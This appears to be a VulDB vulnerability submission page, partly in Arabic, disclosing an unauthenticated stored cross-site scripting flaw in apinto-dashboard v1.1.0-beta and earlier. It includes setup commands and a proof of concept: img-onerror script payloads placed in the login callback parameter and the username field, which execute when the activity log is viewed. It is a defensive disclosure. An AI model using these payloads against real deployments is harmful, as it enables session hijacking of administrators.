إرسال #50338: Unauthenticated Stored XSS in apinto-dashboard <= v1.1.0-beta via callback, usernameالمعلومات

عنوان	Unauthenticated Stored XSS in apinto-dashboard <= v1.1.0-beta via callback, username
الوصف	# Get start repo: https://github.com/eolinker/apinto-dashboard 1,Download and unzip the installation package Apinto 2,Start gateway 3,Download and unzip the installation package Apinto Dashboard 4,Start Apinto Dashboard ```bash wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto ./apinto start cd .. wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard ./apinto-dashboard ``` # Unauthenticated Stored XSS While user loging, the wrong user name and callback parameter will be recorded in the activity log, but the output parameters are not escaped correctly, external attacker can inject arbitrary js code. poc: open /login?callback=/<img src=1 onerror=alert(/2nd-xss/)> enter `<img src=1 onerror=alert(/1st-xss/)>` at the username ![](https://c2.im5i.com/2022/11/01/XrTL4.png) ![](https://c2.im5i.com/2022/11/01/XrXvW.png) then open /activity-log ![](https://c2.im5i.com/2022/11/01/Xrjjd.png) ![](https://c2.im5i.com/2022/11/01/XrHKR.png)
المستخدم	Tomy (UID 34751)
ارسال	01/11/2022 11:54 AM (4 سنوات منذ)
الاعتدال	01/11/2022 04:50 PM (5 hours later)
الحالة	تمت الموافقة
إدخال VulDB	212640 [eolinker apinto-dashboard /login callback البرمجة عبر المواقع]
النقاط	17

التالي ▸نظرة عامة ◂ السابق

Do you need the next level of professionalism?

Upgrade your account now!